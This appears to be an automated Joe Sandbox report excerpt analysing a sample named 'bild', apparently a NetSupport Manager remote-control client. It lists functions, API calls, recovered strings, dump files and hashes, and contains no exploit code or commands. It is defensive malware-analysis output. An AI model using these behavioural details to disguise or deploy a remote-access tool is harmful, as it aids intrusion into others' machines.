                                                                                      • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                      • API String ID: 1594747848-1114959992
                                                                                      • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                      • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                      Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,4012B9B4,?,00000000,00000000), ref: 1102CE44
                                                                                      • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                      • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                      • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                      • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                      • API String ID: 83693535-2077998243
                                                                                      • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                      • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                      Function 11026BA0 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 174sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _strtok.LIBCMT ref: 11026C26
                                                                                      • _strtok.LIBCMT ref: 11026C60
                                                                                      • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strtok$Sleep
                                                                                      • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS$
                                                                                      • API String ID: 2009458258-2711220648
                                                                                      • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                      • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                      Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11132C60
                                                                                      • GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$FolderPathwsprintf
                                                                                      • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                      • API String ID: 1170620360-4157686185
                                                                                      • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                      • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                      Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      • _strncpy.LIBCMT ref: 111451FA
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                      • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                      • API String ID: 3299820421-2117887902
                                                                                      • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                      • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                      Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                      • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                      • GetLastError.KERNEL32 ref: 11102CB1
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                      • GetLastError.KERNEL32 ref: 11102CCF
                                                                                      Strings
                                                                                      • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                      • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                      • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                      • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                      • API String ID: 2036220054-60805735
                                                                                      • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                      • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                      • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                      • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                      Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                      • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                      • wsprintfA.USER32 ref: 1115E3C8
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                      • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                      • API String ID: 1734919802-1728070458
                                                                                      • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                      • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                      • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                      • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                      Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1111013A
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                      • API String ID: 1976012330-1024648535
                                                                                      • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                      • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                      • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                      • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                      Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,4012B9B4,00000000,?), ref: 1115BA67
                                                                                      • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                      • wsprintfW.USER32 ref: 1115BAA7
                                                                                      • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                      • wsprintfW.USER32 ref: 1115BB67
                                                                                      • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                      • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                      • API String ID: 3050498177-823534439
                                                                                      • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                      • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                      • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                      • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                      Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      • _memset.LIBCMT ref: 11145485
                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                      • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
